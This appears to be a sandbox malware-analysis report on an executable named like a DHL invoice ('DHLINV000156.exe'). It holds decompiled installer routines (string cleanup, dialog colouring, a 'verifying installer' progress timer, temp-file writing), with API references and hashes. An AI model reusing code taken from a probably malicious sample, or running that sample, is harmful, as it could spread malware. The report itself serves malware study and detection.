                                        0x73ef254c
                                        0x73ef2553
                                        0x00000000
                                        0x00000000
                                        0x73ef255c
                                        0x00000000
                                        0x00000000
                                        0x73ef256c
                                        0x00000000
                                        0x00000000
                                        0x73ef2598
                                        0x73ef25a0
                                        0x73ef25aa
                                        0x73ef25ac
                                        0x73ef25b1
                                        0x00000000
                                        0x00000000
                                        0x73ef2574
                                        0x73ef2578
                                        0x73ef257a
                                        0x73ef257b
                                        0x73ef257d
                                        0x73ef258d
                                        0x73ef2594
                                        0x00000000
                                        0x00000000
                                        0x73ef25b7
                                        0x73ef25b9
                                        0x73ef25bf
                                        0x73ef25c5
                                        0x73ef25c5
                                        0x00000000
                                        0x00000000
                                        0x73ef251e
                                        0x73ef25c8
                                        0x73ef25c8
                                        0x73ef25cd
                                        0x73ef25de
                                        0x73ef25de
                                        0x73ef25e4
                                        0x73ef25e9
                                        0x73ef25ee
                                        0x73ef25fa
                                        0x73ef25ff
                                        0x00000000
                                        0x73ef2604
                                        0x73ef25f0
                                        0x73ef25f1
                                        0x73ef2605
                                        0x73ef2605
                                        0x73ef25ee
                                        0x73ef2606
                                        0x73ef260a
                                        0x73ef260d
                                        0x73ef2625

                                        APIs
                                          • Part of subcall function 73EF1215: GlobalAlloc.KERNELBASE(00000040,73EF1233,?,73EF12CF,-73EF404B,73EF11AB,-000000A0), ref: 73EF121D
                                        • GlobalFree.KERNEL32 ref: 73EF25DE
                                        • GlobalFree.KERNEL32 ref: 73EF2618
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID: {xv@uxv
                                        • API String ID: 1780285237-1953920604
                                        • Opcode ID: b237cf43cc556f15c1cfbad50195f07b4c54f4e57c1054957f9107f724545463
                                        • Instruction ID: aefa4dcb040408c323ed7d80c20753ab4300d6ae9fb0c976ec20cbf591277e56
                                        • Opcode Fuzzy Hash: b237cf43cc556f15c1cfbad50195f07b4c54f4e57c1054957f9107f724545463
                                        • Instruction Fuzzy Hash: A341DE7A10421BEFDB82DFA4CC94F3A77BEEBC5204B14452AF5458B240D7B19804DB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E73EF22F1(void* __edx, intOrPtr _a4) {
                                        				signed int _v4;
                                        				signed int _v8;
                                        				void* _t38;
                                        				signed int _t39;
                                        				void* _t40;
                                        				void* _t43;
                                        				void* _t48;
                                        				signed int* _t50;
                                        				signed char* _t51;
                                        
                                        				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                        				while(1) {
                                        					_t9 = _a4 + 0x818; // 0x818
                                        					_t51 = (_v8 << 5) + _t9;
                                        					_t38 = _t51[0x18];
                                        					if(_t38 == 0) {
                                        						goto L9;
                                        					}
                                        					_t48 = 0x1a;
                                        					if(_t38 == _t48) {
                                        						goto L9;
                                        					}
                                        					if(_t38 != 0xffffffff) {
                                        						if(_t38 <= 0 || _t38 > 0x19) {
                                        							_t51[0x18] = _t48;
                                        						} else {
                                        							_t38 = E73EF12AD(_t38 - 1);
                                        							L10:
                                        						}
                                        						goto L11;
                                        					} else {
                                        						_t38 = E73EF123B();
                                        						L11:
                                        						_t43 = _t38;
                                        						_t13 =  &(_t51[8]); // 0x820
                                        						_t50 = _t13;
                                        						if(_t51[4] >= 0) {
                                        						}
                                        						_t39 =  *_t51 & 0x000000ff;
                                        						_t51[0x1c] = _t51[0x1c] & 0x00000000;
                                        						_v4 = _t39;
                                        						if(_t39 > 7) {
                                        							L27:
                                        							_t40 = GlobalFree(_t43);
                                        							if(_v8 == 0) {
                                        								return _t40;
                                        							}
                                        							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                        								_v8 = _v8 + 1;
                                        							} else {
                                        								_v8 = _v8 & 0x00000000;
                                        							}
                                        							continue;
                                        						} else {
                                        							switch( *((intOrPtr*)(_t39 * 4 +  &M73EF247E))) {
                                        								case 0:
                                        									 *_t50 =  *_t50 & 0x00000000;
                                        									goto L27;
                                        								case 1:
                                        									__eax = E73EF12FE(__ebx);
                                        									goto L20;
                                        								case 2:
                                        									 *__ebp = E73EF12FE(__ebx);
                                        									_a4 = __edx;
                                        									goto L27;
                                        								case 3:
                                        									__eax = E73EF1224(__ebx);
                                        									 *(__esi + 0x1c) = __eax;
                                        									L20:
                                        									 *__ebp = __eax;
                                        									goto L27;
                                        								case 4:
                                        									 *0x73ef405c =  *0x73ef405c +  *0x73ef405c;
                                        									__edi = GlobalAlloc(0x40,  *0x73ef405c +  *0x73ef405c);
                                        									 *0x73ef405c = MultiByteToWideChar(0, 0, __ebx,  *0x73ef405c, __edi,  *0x73ef405c);
                                        									if(_v4 != 5) {
                                        										 *(__esi + 0x1c) = __edi;
                                        										 *__ebp = __edi;
                                        									} else {
                                        										__eax = GlobalAlloc(0x40, 0x10);
                                        										_push(__eax);
                                        										 *(__esi + 0x1c) = __eax;
                                        										_push(__edi);
                                        										 *__ebp = __eax;
                                        										__imp__CLSIDFromString();
                                        										__eax = GlobalFree(__edi);
                                        									}
                                        									goto L27;
                                        								case 5:
                                        									if( *__ebx != 0) {
                                        										__eax = E73EF12FE(__ebx);
                                        										 *__edi = __eax;
                                        									}
                                        									goto L27;
                                        								case 6:
                                        									__esi =  *(__esi + 0x18);
                                        									__esi = __esi - 1;
                                        									__esi = __esi *  *0x73ef405c;
                                        									__esi = __esi +  *0x73ef4064;
                                        									__eax = __esi + 0xc;
                                        									 *__edi = __esi + 0xc;
                                        									asm("cdq");
                                        									__eax = E73EF1429(__edx, __esi + 0xc, __edx, __esi);
                                        									goto L27;
                                        							}
                                        						}
                                        					}
                                        					L9:
                                        					_t38 = E73EF1224(0x73ef4034);
                                        					goto L10;
                                        				}
                                        			}












                                        0x73ef2306
                                        0x73ef230a
                                        0x73ef2315
                                        0x73ef2315
                                        0x73ef231c
                                        0x73ef2321
                                        0x00000000
                                        0x00000000
                                        0x73ef2325
                                        0x73ef2328
                                        0x00000000
                                        0x00000000
                                        0x73ef232d
                                        0x73ef2338
                                        0x73ef2348
                                        0x73ef233f
                                        0x73ef2341
                                        0x73ef2357
                                        0x73ef2357
                                        0x00000000
                                        0x73ef232f
                                        0x73ef232f
                                        0x73ef2358
                                        0x73ef235c
                                        0x73ef235e
                                        0x73ef235e
                                        0x73ef2361
                                        0x73ef2361
                                        0x73ef2369
                                        0x73ef236c
                                        0x73ef2373
                                        0x73ef2377
                                        0x73ef2446
                                        0x73ef2447
                                        0x73ef2452
                                        0x73ef247d
                                        0x73ef247d
                                        0x73ef2462
                                        0x73ef246e
                                        0x73ef2464
                                        0x73ef2464
                                        0x73ef2464
                                        0x00000000
                                        0x73ef237d
                                        0x73ef237d
                                        0x00000000
                                        0x73ef2384
                                        0x00000000
                                        0x00000000
                                        0x73ef238d
                                        0x00000000
                                        0x00000000
                                        0x73ef239b
                                        0x73ef239e
                                        0x00000000
                                        0x00000000
                                        0x73ef23a7
                                        0x73ef23ac
                                        0x73ef23af
                                        0x73ef23b0
                                        0x00000000
                                        0x00000000
                                        0x73ef23bd
                                        0x73ef23c8
                                        0x73ef23d7
                                        0x73ef23e2
                                        0x73ef2405
                                        0x73ef2408
                                        0x73ef23e4
                                        0x73ef23e8
                                        0x73ef23ee
                                        0x73ef23ef
                                        0x73ef23f2
                                        0x73ef23f3
                                        0x73ef23f6
                                        0x73ef23fd
                                        0x73ef23fd
                                        0x00000000
                                        0x00000000
                                        0x73ef2410
                                        0x73ef2413
                                        0x73ef241f
                                        0x73ef2421
                                        0x00000000
                                        0x00000000
                                        0x73ef2424
                                        0x73ef2427
                                        0x73ef2428
                                        0x73ef242f
                                        0x73ef2436
                                        0x73ef2439
                                        0x73ef243b
                                        0x73ef243e
                                        0x00000000
                                        0x00000000
                                        0x73ef237d
                                        0x73ef2377
                                        0x73ef234d
                                        0x73ef2352
                                        0x00000000
                                        0x73ef2352

                                        APIs
                                        • GlobalFree.KERNEL32 ref: 73EF2447
                                          • Part of subcall function 73EF1224: lstrcpynA.KERNEL32(00000000,?,73EF12CF,-73EF404B,73EF11AB,-000000A0), ref: 73EF1234
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 73EF23C2
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73EF23D7
                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73EF23E8
                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 73EF23F6
                                        • GlobalFree.KERNEL32 ref: 73EF23FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                        • String ID: @uxv
                                        • API String ID: 3730416702-3068791405
                                        • Opcode ID: 05e77a47d969cc1b88497d1852fc3963e5383fd5808723949827482c63bd482f
                                        • Instruction ID: bba5011dbcbc800b51a9a89a3e29ebecbd3cd6d164fefbbf2317584b225a1571
                                        • Opcode Fuzzy Hash: 05e77a47d969cc1b88497d1852fc3963e5383fd5808723949827482c63bd482f
                                        • Instruction Fuzzy Hash: D541A1BA50575BEFE3919F609844B2A77FDFB80315F10891AE84ACA180D7F0E544CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00406244(CHAR* _a4) {
                                        				char _t5;
                                        				char _t7;
                                        				char* _t15;
                                        				char* _t16;
                                        				CHAR* _t17;
                                        
                                        				_t17 = _a4;
                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                        					_t17 =  &(_t17[4]);
                                        				}
                                        				if( *_t17 != 0 && E004059DF(_t17) != 0) {
                                        					_t17 =  &(_t17[2]);
                                        				}
                                        				_t5 =  *_t17;
                                        				_t15 = _t17;
                                        				_t16 = _t17;
                                        				if(_t5 != 0) {
                                        					do {
                                        						if(_t5 > 0x1f &&  *((char*)(E0040599D("*?|<>/\":", _t5))) == 0) {
                                        							E00405B2E(_t16, _t17, CharNextA(_t17) - _t17);
                                        							_t16 = CharNextA(_t16);
                                        						}
                                        						_t17 = CharNextA(_t17);
                                        						_t5 =  *_t17;
                                        					} while (_t5 != 0);
                                        				}
                                        				 *_t16 =  *_t16 & 0x00000000;
                                        				while(1) {
                                        					_t16 = CharPrevA(_t15, _t16);
                                        					_t7 =  *_t16;
                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                        						break;
                                        					}
                                        					 *_t16 =  *_t16 & 0x00000000;
                                        					if(_t15 < _t16) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				return _t7;
                                        			}








                                        0x00406246
                                        0x0040624e
                                        0x00406262
                                        0x00406262
                                        0x00406268
                                        0x00406275
                                        0x00406275
                                        0x00406276
                                        0x00406278
                                        0x0040627c
                                        0x0040627e
                                        0x00406287
                                        0x00406289
                                        0x004062a3
                                        0x004062ab
                                        0x004062ab
                                        0x004062b0
                                        0x004062b2
                                        0x004062b4
                                        0x004062b8
                                        0x004062b9
                                        0x004062bc
                                        0x004062c4
                                        0x004062c6
                                        0x004062ca
                                        0x00000000
                                        0x00000000
                                        0x004062d0
                                        0x004062d5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004062d5
                                        0x004062da

                                        APIs
                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DHLINV000156.exe",74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040629C
                                        • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062A9
                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\DHLINV000156.exe",74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062AE
                                        • CharPrevA.USER32(?,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062BE
                                        Strings
                                        • *?|<>/":, xrefs: 0040628C
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406245
                                        • "C:\Users\user\Desktop\DHLINV000156.exe", xrefs: 00406280
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\DHLINV000156.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-538122564
                                        • Opcode ID: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                        • Instruction ID: 98a55a52ac5494643caf5fd5857683424a9a77f1076ac2e6562e20d377716777
                                        • Opcode Fuzzy Hash: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                        • Instruction Fuzzy Hash: EE11E25180879029EB3226344C40B7B7F988F5B760F2904FFE9D6722C2D67C5C52876E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004040CF(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                        				struct tagLOGBRUSH _v16;
                                        				long _t39;
                                        				long _t41;
                                        				void* _t44;
                                        				signed char _t50;
                                        				long* _t54;
                                        
                                        				if(_a4 + 0xfffffecd > 5) {
                                        					L18:
                                        					return 0;
                                        				}
                                        				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                        					goto L18;
                                        				} else {
                                        					_t50 = _t54[5];
                                        					if((_t50 & 0xffffffe0) != 0) {
                                        						goto L18;
                                        					}
                                        					_t39 =  *_t54;
                                        					if((_t50 & 0x00000002) != 0) {
                                        						_t39 = GetSysColor(_t39);
                                        					}
                                        					if((_t54[5] & 0x00000001) != 0) {
                                        						SetTextColor(_a8, _t39);
                                        					}
                                        					SetBkMode(_a8, _t54[4]);
                                        					_t41 = _t54[1];
                                        					_v16.lbColor = _t41;
                                        					if((_t54[5] & 0x00000008) != 0) {
                                        						_t41 = GetSysColor(_t41);
                                        						_v16.lbColor = _t41;
                                        					}
                                        					if((_t54[5] & 0x00000004) != 0) {
                                        						SetBkColor(_a8, _t41);
                                        					}
                                        					if((_t54[5] & 0x00000010) != 0) {
                                        						_v16.lbStyle = _t54[2];
                                        						_t44 = _t54[3];
                                        						if(_t44 != 0) {
                                        							DeleteObject(_t44);
                                        						}
                                        						_t54[3] = CreateBrushIndirect( &_v16);
                                        					}
                                        					return _t54[3];
                                        				}
                                        			}









                                        0x004040e1
                                        0x00404197
                                        0x00000000
                                        0x00404197
                                        0x004040f2
                                        0x004040f6
                                        0x00000000
                                        0x00404110
                                        0x00404110
                                        0x00404119
                                        0x00000000
                                        0x00000000
                                        0x0040411b
                                        0x00404127
                                        0x0040412a
                                        0x0040412a
                                        0x00404130
                                        0x00404136
                                        0x00404136
                                        0x00404142
                                        0x00404148
                                        0x0040414f
                                        0x00404152
                                        0x00404155
                                        0x00404157
                                        0x00404157
                                        0x0040415f
                                        0x00404165
                                        0x00404165
                                        0x0040416f
                                        0x00404174
                                        0x00404177
                                        0x0040417c
                                        0x0040417f
                                        0x0040417f
                                        0x0040418f
                                        0x0040418f
                                        0x00000000
                                        0x00404192

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                        • Instruction ID: 778babcb3f3cb4702814cedc7f3687c69535c8aec6342fb1ab2b401637f1774e
                                        • Opcode Fuzzy Hash: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                        • Instruction Fuzzy Hash: 8A21C7715047049BC7309F78DC4CB5BBBF8AF91710B048A2AEA96A62E0D334E884CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004049BB(struct HWND__* _a4, intOrPtr _a8) {
                                        				long _v8;
                                        				signed char _v12;
                                        				unsigned int _v16;
                                        				void* _v20;
                                        				intOrPtr _v24;
                                        				long _v56;
                                        				void* _v60;
                                        				long _t15;
                                        				unsigned int _t19;
                                        				signed int _t25;
                                        				struct HWND__* _t28;
                                        
                                        				_t28 = _a4;
                                        				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                        				if(_a8 == 0) {
                                        					L4:
                                        					_v56 = _t15;
                                        					_v60 = 4;
                                        					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                        					return _v24;
                                        				}
                                        				_t19 = GetMessagePos();
                                        				_v16 = _t19 >> 0x10;
                                        				_v20 = _t19;
                                        				ScreenToClient(_t28,  &_v20);
                                        				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                        				if((_v12 & 0x00000066) != 0) {
                                        					_t15 = _v8;
                                        					goto L4;
                                        				}
                                        				return _t25 | 0xffffffff;
                                        			}














                                        0x004049c9
                                        0x004049d6
                                        0x004049dc
                                        0x00404a1a
                                        0x00404a1a
                                        0x00404a29
                                        0x00404a30
                                        0x00000000
                                        0x00404a32
                                        0x004049de
                                        0x004049ed
                                        0x004049f5
                                        0x004049f8
                                        0x00404a0a
                                        0x00404a10
                                        0x00404a17
                                        0x00000000
                                        0x00404a17
                                        0x00000000

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                        • Instruction ID: 78e79842b3afbaa1123eb4bc953d8a824fe30bd623f786c3032228cde2642f29
                                        • Opcode Fuzzy Hash: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                        • Instruction Fuzzy Hash: DA018071D40218BAEB00DB94DC81BFEBBB8AB45B11F10412BBA00B61D0C7B469418BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00402CDD(struct HWND__* _a4, intOrPtr _a8) {
                                        				char _v68;
                                        				int _t11;
                                        				int _t20;
                                        
                                        				if(_a8 == 0x110) {
                                        					SetTimer(_a4, 1, 0xfa, 0);
                                        					_a8 = 0x113;
                                        				}
                                        				if(_a8 == 0x113) {
                                        					_t20 =  *0x4128b8; // 0xc132a
                                        					_t11 =  *0x41e8c4; // 0xc35e0
                                        					if(_t20 >= _t11) {
                                        						_t20 = _t11;
                                        					}
                                        					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                        					SetWindowTextA(_a4,  &_v68);
                                        					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                        				}
                                        				return 0;
                                        			}






                                        0x00402cea
                                        0x00402cf8
                                        0x00402cfe
                                        0x00402cfe
                                        0x00402d0c
                                        0x00402d0e
                                        0x00402d14
                                        0x00402d1b
                                        0x00402d1d
                                        0x00402d1d
                                        0x00402d33
                                        0x00402d43
                                        0x00402d55
                                        0x00402d55
                                        0x00402d5d

                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                        • MulDiv.KERNEL32(000C132A,00000064,000C35E0), ref: 00402D23
                                        • wsprintfA.USER32 ref: 00402D33
                                        • SetWindowTextA.USER32(?,?), ref: 00402D43
                                        • SetDlgItemTextA.USER32 ref: 00402D55
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402D2D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                        • Instruction ID: 989b2dafafbc5add767bef13d928cf85595003a1ad1b8b7172a09c7de12a9e27
                                        • Opcode Fuzzy Hash: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                        • Instruction Fuzzy Hash: 3801EC71A40209ABEF20AF60DD49FAE3769EB04305F008039FA06AA1D0D7B599558F59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E004027A3(void* __ebx) {
                                        				void* _t26;
                                        				long _t31;
                                        				void* _t45;
                                        				void* _t49;
                                        				void* _t51;
                                        				void* _t54;
                                        				void* _t55;
                                        				void* _t56;
                                        
                                        				_t45 = __ebx;
                                        				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                        				_t50 = E00402B2C(0xfffffff0);
                                        				 *(_t56 - 0x4c) = _t23;
                                        				if(E004059DF(_t50) == 0) {
                                        					E00402B2C(0xffffffed);
                                        				}
                                        				E00405B4E(_t50);
                                        				_t26 = E00405B73(_t50, 0x40000000, 2);
                                        				 *(_t56 + 8) = _t26;
                                        				if(_t26 != 0xffffffff) {
                                        					_t31 =  *0x423718;
                                        					 *(_t56 - 0x1c) = _t31;
                                        					_t49 = GlobalAlloc(0x40, _t31);
                                        					if(_t49 != _t45) {
                                        						E004031ED(_t45);
                                        						E004031D7(_t49,  *(_t56 - 0x1c));
                                        						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x2c));
                                        						 *(_t56 - 0x10) = _t54;
                                        						if(_t54 != _t45) {
                                        							_push( *(_t56 - 0x2c));
                                        							_push(_t54);
                                        							_push(_t45);
                                        							_push( *((intOrPtr*)(_t56 - 0x30)));
                                        							E00402FFB();
                                        							while( *_t54 != _t45) {
                                        								_t47 =  *_t54;
                                        								_t55 = _t54 + 8;
                                        								 *(_t56 - 0x48) =  *_t54;
                                        								E00405B2E( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                        								_t54 = _t55 +  *(_t56 - 0x48);
                                        							}
                                        							GlobalFree( *(_t56 - 0x10));
                                        						}
                                        						E00405C1A( *(_t56 + 8), _t49,  *(_t56 - 0x1c));
                                        						GlobalFree(_t49);
                                        						_push(_t45);
                                        						_push(_t45);
                                        						_push( *(_t56 + 8));
                                        						_push(0xffffffff);
                                        						 *((intOrPtr*)(_t56 - 0xc)) = E00402FFB();
                                        					}
                                        					CloseHandle( *(_t56 + 8));
                                        				}
                                        				_t51 = 0xfffffff3;
                                        				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                        					_t51 = 0xffffffef;
                                        					DeleteFileA( *(_t56 - 0x4c));
                                        					 *((intOrPtr*)(_t56 - 4)) = 1;
                                        				}
                                        				_push(_t51);
                                        				E00401423();
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t56 - 4));
                                        				return 0;
                                        			}











                                        0x004027a3
                                        0x004027a5
                                        0x004027b1
                                        0x004027b4
                                        0x004027be
                                        0x004027c2
                                        0x004027c2
                                        0x004027c8
                                        0x004027d5
                                        0x004027dd
                                        0x004027e0
                                        0x004027e6
                                        0x004027f4
                                        0x004027f9
                                        0x004027fd
                                        0x00402800
                                        0x00402809
                                        0x00402815
                                        0x00402819
                                        0x0040281c
                                        0x0040281e
                                        0x00402821
                                        0x00402822
                                        0x00402823
                                        0x00402826
                                        0x00402845
                                        0x0040282d
                                        0x00402832
